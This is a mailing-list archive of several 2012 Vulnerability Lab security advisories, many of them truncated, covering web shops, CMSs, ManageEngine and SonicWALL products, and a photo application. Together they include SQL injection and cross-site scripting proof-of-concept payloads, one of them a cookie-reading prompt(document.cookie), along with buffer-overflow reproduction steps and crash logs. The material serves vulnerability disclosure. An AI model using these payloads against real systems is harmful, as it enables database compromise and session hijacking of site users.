2012-11-01 Thread Vulnerability Lab

Title:
==
VaM Shop v1.69 - Multiple Web Vulnerabilities


Date:
=
2012-10-24


References:
===
http://www.vulnerability-lab.com/get_content.php?id=730


VL-ID:
=
730


Common Vulnerability Scoring System:

8.1


Introduction:
=
(Vendor Website: http://vamshop.ru/ )


Abstract:
=
The Security Effect Research Team discovered multiple Web Vulnerabilities in 
the VaM Shop v1.69 web application cms. 


Report-Timeline:

2012-10-24: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A laboratory researcher discovered a critical sql injection vulnerability in 
the VaM Shop v1.69 web application content management system.
The sql vulnerability allow remote attackers to inject/execute own sql 
commands/statements on the affected VaM Shop v1.69 web application 
dbms. The vulnerability is located in the shopping_cart.php files with the 
bound vulnerable products_id parameter request. The vulnerability 
can be exploited by remote attackers without required user inter action. 
Successful exploitation of the vulnerability results in web application
dbms and service compromise or stable application manipulation via sql 
injection.

Vulnerable Files(s):
[+] shopping_cart.php

Vulnerable Parameter(s):
[+] products_id


1.2
A laboratory researcher discovered a client side Cross Site Scripting 
Vulnerability in the VaM Shop v1.69 web application content management system.
The vulnerability is located in the advanced_search_result.php file when 
processing to load script code out of the search results web context. 
Successful exploitation results in session hijacking, non -persistent account 
phishing or client side content manipulation.

Vulnerable Files(s):
[+] advanced_search_result.php


Proof of Concept:
=
1. Blind SQL injection in shopping_cart.php in parameter product_id[]. 
The SQL Injection vulnerability can be exploited by remote attackers without 
privileged application user account.
For demonstration or reproduce ...

PoC: POST  - SQL INJECTION

/shopping_cart.php
?action=update_product
cart_delete[]=2071cart_quantity[]=1old_qty[]=1products_id[]=2071'[SQL 
INJECTION VULNERABILITY] and sleep(37)%3d%27

 
2. Multiple Cross Site Scripting
The client side cross site scripting vulnerabilities can be exploited by remote 
attacker with medium or high required user inter action.
For demonstration or reproduce ...

PoC:
/advanced_search_result.php/o onmouseover=prompt(document.cookie) //
/shopping_cart.php?action=update_product  cart_delete[]=o 
onmouseover=prompt(document.cookie) //


Risk:
=
1.
The security risk of the blind sql injection vulnerability is estimated as 
high(+).

2.
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories

BananaDance Wiki b2.2 - Multiple Web Vulnerabilities

2012-11-12 Thread Vulnerability Lab

Title:
==
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities


Date:
=
2012-11-10


References:
===
http://www.vulnerability-lab.com/get_content.php?id=745


VL-ID:
=
745


Common Vulnerability Scoring System:

7.1


Introduction:
=
Banana Dance is an open-source PHP/MySQL-based program. It is designed to 
combine the simplicity of wiki-publishing 
software with the versatility of a CMS. The program also promotes 
community-building through organized and 
user-rated commenting features. Highly flexible with theme-integration and 
extension availability Banana Dance 
can be used for all types of purposes, whether it be to create an entire 
website, a product owner`s manual, or 
an `article`-posting site.

(Copy of the Vendor Homepage: http://www.bananadance.org )


Abstract:
=
The vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the official BananaDance Wiki b2.2 CMS.


Report-Timeline:

2012-11-10: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A SQL Injection vulnerability is detected in the BananaDance Wiki B2.2 Content 
Management System.
The vulnerability allows an attacker (remote) or local privileged 
moderator/admin user account to execute own 
SQL commands on the affected application dbms. The sql injection vulnerability 
is located in user management module 
with the bound vulnerable alpha listing parameter. Successful exploitation of 
the vulnerability results in dbms  
application compromise. Exploitation requires no user interaction  without 
privileged user account.

Vulnerable Module(s):
[+] User Management

Vulnerable Parameter(s):
[+] alpha


1.2
Multiple persistent input validation vulnerabilities are detected in the 
BananaDance Wiki B2.2 Content Management System. 
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent) of the vulnerable module. 
The persistent vulnerabilities are located in the user, banned user, badge 
module listing with the bound vulnerable username and email parameters. 
Successful exploitation of the vulnerability can lead to session hijacking 
(manager/admin) or stable (persistent) context manipulation. 
Exploitation requires low user inter action (view listing)  a registered low 
privileged web application user account.

Vulnerable Module(s):
[+] Add User - Listing
[+] Banned User - Listing
[+] Badges - Listing

Vulnerable Parameter(s):
[+] Username  Email (Profil)


Proof of Concept:
=
1.1
The sql injection vulnerability can be exploited by local privileged user 
accounts and moderators.
For demonstration or reproduce ...

PoC:
html
headbody
titleBananaDance Wiki b2.2 - SQL Vulnerability/title
iframe 
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=A'-1 
[SQL-INJECTION!]-- width=1000 height=800
iframe 
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=M'-1 
[SQL-INJECTION!]-- width=1000 height=800
iframe 
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=K'-1 
[SQL-INJECTION!]-- width=1000 height=800
/body/head
html


1.2
The persistent input validation vulnerabilities can be exploited by remote 
attacker with low privileged application user account and 
low required user inter action. For demonstration or reproduce ...

Review: Add (Existing) User - Listing

tr id=19
td valign=topcenterimg src=imgs/status-on.png id=status19 
alt=Active title=Active border=0 height=16 width=16/center/td
td valign=topa href=index.php?l=users_editid=19[PERSISTENT 
EXECUTION OF INJECTED SCRIPT CODE!];) = a=/td
td valign=top2012-06-20/td
td valign=topspan style=ESTANDAR/span/td
td valign=top0/td
td valign=top0/td
td valign=top0/td
td valign=topa href=# onClick=deleteID('bd_users','19');return false;
img src=imgs/icon-delete.png border=0 alt=Delete title=Delete 
//a/td
/tr

URL(s): 
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users  
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add


Risk:
=
1.1
The security risk of the local sql injection vulnerability is estimated as 
medium(+) because of the required moderator account.

1.2
The security risk of the persistent input validation vulnerabilities are 
estimated as high.


Credits:

Vulnerability Laboratory [Research Team]  - Kathrin SL 
(ka...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability

Eventy CMS v1.8 Plus - Multiple Web Vulnerablities

2012-11-13 Thread Vulnerability Lab

 as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]




Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory




-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities

2012-11-13 Thread Vulnerability Lab

=no name=PenTest40 /
/keyword
keyword category=yes name=[BUFFER OVERFLOW (EIPEBX) VIA 
IMPORT KEYWORDS!]
keyword category=yes name=31337; /
keyword category=no name=Ibrahim El-Sayed /
keyword category=no name=PenTest41 /
keyword category=no name=PenTest42 /
keyword category=no name=PenTest43 /
keyword category=no name=PenTest44 /
keyword category=no name=PenTest45 /
keyword category=no name=PenTest46 /
keyword category=no name=PenTest47 /
keyword category=no name=PenTest48 /
keyword category=no name=PenTest49 /
/keyword
/hierarchy
/keywords';
?

--- Debug Logs ---
(3a98.1840): Access violation - code c005 
eax= ebx=00410041 ecx=31e7 edx=0878dd68 esi=0021ced0 edi=
eip=41414141 esp=0021ce68 ebp=0021cebc iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!ZwRaiseException+0x12:
76fd15de 83c404  add esp,4
0:000 u
ntdll!ZwRaiseException+0x12:
76fd15de 83c404  add esp,4
76fd15e1 c20c00  ret 0Ch
ntdll!NtRaiseHardError:
76fd15e4 b83001  mov eax,130h
76fd15e9 33c9xor ecx,ecx
76fd15eb 8d542404lea edx,[esp+4]
76fd15ef 64ff15c000  calldword ptr fs:[0C0h]
76fd15f6 83c404  add esp,4
76fd15f9 c21800  ret 18h
0:000 a
76fd15de !exchain



1.2
The buffer overflow vulnerability can be exploited by local attackers with low 
privileged system user account and without required user inter action.
For demonstration or reproduce ...

Manually Exploitation/Reproduce: Publizieren  Per Mail versenden  Zip 
Comprimierung der Bilder  Archivname + FILE.[ZIP] (STRG+UMS+M)

1. Install  start the Zoner Photo Studio Software
2. Click in the main menu the Publizieren button and open the Per Mail 
versenden function -  STRG+UMS+M 
3. Activate the Zip Compressed Pictures function (Zip Comprimierung der Bilder)
4. Now, you see the standard value (Dateien.zip)
5. Delete one of both words but do not delete the `.` because it is required 
for a not invalid submission (via OK Button)
6. Include the following example strings  Daten.[+Large String AA+]  or  
[Large String AA+].zip and click OK!
7. *BAM! Result is a stack-based buffer overflow [overwrites the ebx  eip]


--- Exception Logs ---
EventType=BEX [Buffer Overflow]
EventTime=129972361437653387
ReportType=2
Consent=1
ReportIdentifier=cfbd2b2a-2d1f-11e2-be0d-8c500fdd2fd9
IntegratorReportIdentifier=cfbd2b29-2d1f-11e2-be0d-8c500fdd2fd9
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Zps.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=14.0.1.7
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4fffeaeb
Sig[3].Name=Fehlermodulname
Sig[3].Value=StackHash_24fa
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=
Sig[6].Name=Ausnahmeoffset
Sig[6].Value=41414141=== EIP
Sig[7].Name=Ausnahmecode
Sig[7].Value=c005
Sig[8].Name=Ausnahmedaten
Sig[8].Value=0008

--- Debug Logs ---
- Access violation - code c005
ebx=00410041 
eip=41414141


Risk:
=
The security risk of the local buffer overflow vulnerabilities are estimated as 
medium(+)|(-)high.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user

iDev Rentals v1.0 - Multiple Web Vulnerabilities

2012-11-14 Thread Vulnerability Lab

 will be executed. 

URL: 
http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=categories

1.3
The remote attacker can add packages to inject own malicious persistent script 
code, 
iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in 
the fields package name or package description
When a user is processing to view the packages listing, the malicious script 
code will be executed. 

URL: 
http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=add_package


Risk:
=
1.1
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).


Credits:

Vulnerability Laboratory  - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]



Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)

2012-11-19 Thread Vulnerability Lab

Title:
==
Akeni LAN v1.2.118 - Filter Bypass Vulnerability


Date:
=
2012-11-14


References:
===
http://www.vulnerability-lab.com/get_content.php?id=761


VL-ID:
=
761


Common Vulnerability Scoring System:

3.3


Introduction:
=
Akeni LAN Messenger is an IM system designed for your LAN. It is easy to setup 
and does not requires a dedicated server 
or Internet connection. The rich client support chat, notification, 
conferencing, and file transfer. For those who also need 
authentication and encryption, please take a look at our Expert and Pro 
products.

If your organization needs a web based solution that requires no client side 
installation of software, please take a look 
at our Web Chat. Due to the peer-to-peer nature of the product, there is no 
single point of failure and there is no need for 
any network setup. This make Akeni LAN Messenger a good solution for dynamic 
environment where two people can communicate with 
one another as long as the network itself is up and running. For example, LAN 
Messenger can be used by IT support personnel 
who needs a way to communicate and send files with each other anywhere in their 
network easily, without the need to connect 
to the Internet or to a centralized server.

(Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a filter bypass software 
vulnerability in the official Akeni LAN (LE) Messenger v1.2.118.


Report-Timeline:

2012-11-14: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Local


Severity:
=
Medium


Details:

A filter bypass software vulnerability is the detected in the official Akeni 
LAN (LE) Messenger v1.2.118.
The bug allows local attackers to inject own malicious persistent script codes 
on application-side.
The vulnerability is located in the Akeni `incorrect length` exception-handling 
module with the bound vulnerable 
groupname (Gruppenname) parameter. The filter of the Akeni LAN Messenger 
santizes malicious tags and evil frame 
context but does not recognize a secound splitted (%20) request after the 
first. The attacker can provoke a first 
parse by injecting for example a `` to match the invalid exception criterias. 
After the provoke he splits the request 
with %20 and inject his own tags directly after it. The result is a persistent 
script code execution out of the invalid length 
 invalid parameter software exception-handling.

Vulnerable Module(s):
[+] Menu  Action  Contact List  Add Group

Vulnerable Parameter(s):
[+] Incorrect Length - Exception-Handling
[+] Invalid Context - Exception-Handling


Proof of Concept:
=
The vulnerability can be exploited by local attackers without required user 
inter action. For demonstration or reproduce ...

1.
Let us watch the exception-handling of the invalid length. First we inject a 
standard iframe like iframe src=a

['] has incorrect length.
 Groups name must have between %2 and %3 characters.

... the validation of the incorrect length or invalid parameter redisplays the 
message but parse the iframe tag.
We can see in the parse the  which is splitted from the parse itself and 
shows is there could be an injection possibility.

1.2
The next step will be to split the request. HOW?! We inject a standard iframe 
(iframe src=a) split the request 
with %20 (Space) and inject the secound script code after the split.

PoC:
String: iframe src=a%20img 
src=http://www.vulnerability-lab.com/gfx/logo-header.png

--- Exception Logs (Bypass) ---
[] has incorrect length. 
Groups name must have between 30 and %3 characters.


Risk:
=
The security risk of the local persistent software vulnerability is estimated 
as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com

Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites

2012-11-19 Thread Vulnerability Lab

=alert(VL)/
When the user browses the alarms page in the control panel the persistent 
injected script code will be 
executed out of the web application context.

1.2
PoC:
http://exchangereporterplus.127.0.0.1:8080/exchange/ReportsIndex.do
?selectedTab=reportsreportCategoryID=3+iframe src=http://www.vuln-lab.com 
onload=alert(VL)/iframe

The attacker can go to reports and insert own malicious script code inside of 
the search report box to exploit the service application.


Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.2
The security risk of the client side cross site vulnerabilities are estimated 
as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities

2012-11-20 Thread Vulnerability Lab

Title:
==
SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities


Date:
=
2012-11-19


References:
===
http://www.vulnerability-lab.com/get_content.php?id=549


VL-ID:
=
549


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tapeless Enterprise-Level Data Backup and Protection, Without the Price Tag. 
Automatic, real-time data backup for 
servers, laptops and PCs. Features include file versioning, fast data recovery, 
and automatic offsite backup 
capabilities to protect businesses against disasters. SonicWALL® Continuous 
Data Protection (CDP) v6 is a next-
generation data backup and disaster recovery solution that automatically 
preserves and protects business-relevant 
data assets against loss from file, device, and location based disasters. With 
support for Windows®, Linux® and 
Mac OS® through a single Web GUI, CDP provides granular, globally enforced 
policy controls over the entire backup 
operation. Unmatched flexibility enables IT administrators to dictate what 
information to backup, what to exclude 
and how the information should be maintained to adhere to recovery and 
compliance requirements. A sophisticated 
new fileset backup methodology combined with agent-based data de-duplication 
moves and stores only unique data 
blocks. This speeds the backup process and optimizes bandwidth usage while 
maintaining total information continuity 
and the ability to flexibly restore multiple revisions. SonicWALL Continuous 
Data Protection v6 offers the 
comprehensive data protection organizations demand and the power administrators 
need for vigilant data backup 
and disaster recovery.

(Copy of the Vendor Homepage: 
http://sonicwall.com/emea/backup_and_recovery.html)


Abstract:
=
Vulnerability Lab Research Team discovered multiple Vulnerabilities in 
SonicWalls Continuous Data Protection v6.x  5040 appliance application.


Report-Timeline:

2012-05-04: Researcher Notification  Coordination
2012-05-08: Vendor Notification 1
2012-08-10: Vendor Notification 2
2012-08-16: Vendor Response/Feedback
2012-11-01: Vendor Fix/Patch by Check
2012-11-19: Public Disclosure


Status:

Published


Affected Products:
==
SonicWall
Product: Continues Data Protection GUI v5040 6.0.x


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in SonicWalls 
Continuous Data Protection v6.x  5040 appliance application.
The vulnerability allows an remote attacker or local low privileged user 
account to inject/implement malicious persistent script code 
on application side of the appliance application. 

The vulnerabilities are located in the network, accounts management and system 
settings modules with the bound vulnerable label 
delAppl (name, username  servername) parameters. An attackers can inject 
script code as name, username or servername via add function 
to manipulate the vulnerable module with malicious persistent web context. The 
persistent script code will be executed when the victim 
is processing to watch the vulnerable module listing (output|index).

Successful exploitation of the vulnerability result in session hijacking 
(customer/manager/admin) or stable (persistent) module 
context manipulation. Exploitation requires low user inter action and a low 
privileged web application user account.

Vulnerable Module(s):
[+] Network  Settings [Name]
[+] BMR  Accounts  [Username]
[+] System  Settings [Server]

Vulnerable Parameter(s):
[+] label delAppl - Name
[+] label delAppl - Username
[+] label delAppl - Servername


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attackers with local low privileged user accounts and 
low required user interaction. For demonstration or reproduce ...

Review: Network  Settings  ADD  [Name] - label delAppl - Name

label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/tdtd 
class=tableLineContrast 
name=ipspanlabel for=delAppl_0 192.168.150.216/label/span/tdtd 
class=tableLineContrast name=netmaskspanlabel for=delAppl_0 
255.255.255.0/label/span/tdtd class=tableLineContrast 
name=gatewayspanlabel 
for=delAppl_0 192.168.150.1/label/span/tdtd class=tableLineContrast 
nowrap=a 
class=swlEventEdit href=# title=Edit Entryimg class=actionIcon 
width=20 height=20 border=0 alt=Edit this entry 
src=images/edit.gif//a/tdtd input type=hidden name=itemId 
value=undefined/input/td/tr/tbody/table/iframe/label


Review: BMR  Accounts  [Username] - label delAppl - Username

label for=delAppl_0[PERSISTENT SCRIPT CODE!]/label/span/tdtd 
class=tableLineContrast 
spanlabel for=delAppl_0

ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities

2012-11-21 Thread Vulnerability Lab

Title:
==
ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities


Date:
=
2012-11-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=689


VL-ID:
=
689


Common Vulnerability Scoring System:

3.5


Introduction:
=
ServiceDesk Plus integrates your help desk requests and assets to help you 
manage your IT effectively. It helps you 
implement ITIL best practices and troubleshoot IT service requests faster. 
ServiceDesk Plus is a highly customizable, 
easy-to-implement help desk software. More than 10,000 IT managers worldwide 
use ServiceDesk Plus to manage their IT 
help desk and assets. ServiceDesk Plus is available in 23 different languages.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/service-desk/)


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in ManageEngines ServiceDesk v8.0 Plus.


Report-Timeline:

2012-11-15: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in 
ManageEngines ServiceDesk v8.0 Plus web application.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 
Two vulnerabilities are located in the my details and request new incidents 
module of the web front-end with the bound 
vulnerable name, subject and description parameters. Exploitation requires low 
user inter action  low privileged 
customer web application user account. The secound part of the bugs are located 
in the New Contract, Access points and 
Create Solution module of the admin/moderator back-end with the bound 
vulnerable title, asset name, contract name, description 
or support name. Successful exploitation of the vulnerability can lead to 
session hijacking (customer/manager/admin), persistent 
phishing or stable (persistent) web context manipulation.


Vulnerable Module(s):   Customer/User/Moderator Front-End
[+] My Details - [Name]
[+] Requests - New Incident - [Subject] - 
[Description] 



Vulnerable Module(s):   Admin/Moderator Back-End
[+] Solution - Create Solution - [Title]
[+] Assets - It Assets - Access points - [Asset name]
[+] Contract - New Contract - [Contract Name] - 
[Description] - [name] - [Support]


Proof of Concept:
=
The persistent input validation vulnerability can be exploited by remote 
attackers with low required user inter action 
 low privileged user account. For demonstration or reproduce ...

The vulnerability in the Requester account can be exploited by many different 
methods. The first attacking vector can be 
launched by creating a request and injecting a malicious code in the subject 
and description field of the request. When 
the victim views the requests and stops by the mouse courser on the request 
name. The code gets executed in the small 
pop up window that contains the Subject and Description information of the 
request. Another way to attack the admin is to 
edit the details of the requester account and inject the malicious code in the 
field Name. After that, the attacker 
creates a request. Once the admin views the requests, the code gets executed in 
the field of the requester name.


Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]



Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com

FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability

2012-12-03 Thread Vulnerability Lab

